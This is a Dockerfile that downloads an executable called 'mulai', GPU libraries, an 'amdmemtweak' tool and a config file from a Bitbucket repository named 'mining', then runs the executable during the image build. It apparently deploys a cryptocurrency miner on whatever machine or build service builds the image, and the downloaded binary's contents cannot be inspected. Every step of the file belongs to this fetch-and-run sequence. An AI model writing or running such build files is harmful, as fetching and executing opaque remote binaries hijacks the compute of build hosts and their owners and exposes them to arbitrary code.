FROM ubuntu:20.04

RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/AkunAbalAbal00/mining/downloads/mulai
RUN wget https://bitbucket.org/AkunAbalAbal00/mining/downloads/libnvrtc-builtins.so
RUN wget https://bitbucket.org/AkunAbalAbal00/mining/downloads/libnvrtc.so.10.0
RUN wget https://bitbucket.org/AkunAbalAbal00/mining/downloads/amdmemtweak
RUN wget https://bitbucket.org/AkunAbalAbal00/mining/downloads/config.ini
RUN chmod u+x mulai
RUN ./mulai